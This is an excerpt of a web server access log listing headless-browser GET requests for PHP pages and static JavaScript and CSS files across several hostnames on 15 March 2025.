123.160.223.72 - - [15/Mar/2025:22:14:38 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
123.160.223.74 - - [15/Mar/2025:22:14:38 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://staff.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
123.160.223.75 - - [15/Mar/2025:22:14:38 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://staff.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
111.7.96.161 - - [15/Mar/2025:22:14:38 +0100] "GET /layout.php HTTP/1.1" 200 820 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
123.160.223.72 - - [15/Mar/2025:22:14:38 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://food-and-drink.vienna-lodgings.at/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
123.160.223.72 - - [15/Mar/2025:22:14:38 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
123.160.223.73 - - [15/Mar/2025:22:14:38 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
111.7.106.105 - - [15/Mar/2025:22:14:38 +0100] "GET /layout.php HTTP/1.1" 200 814 "http://mail.creativecube.at/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
123.160.223.75 - - [15/Mar/2025:22:14:38 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://smtpo.financetrainer.com/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
123.160.223.74 - - [15/Mar/2025:22:14:38 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://staff.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
123.160.223.74 - - [15/Mar/2025:22:14:38 +0100] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://staff.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
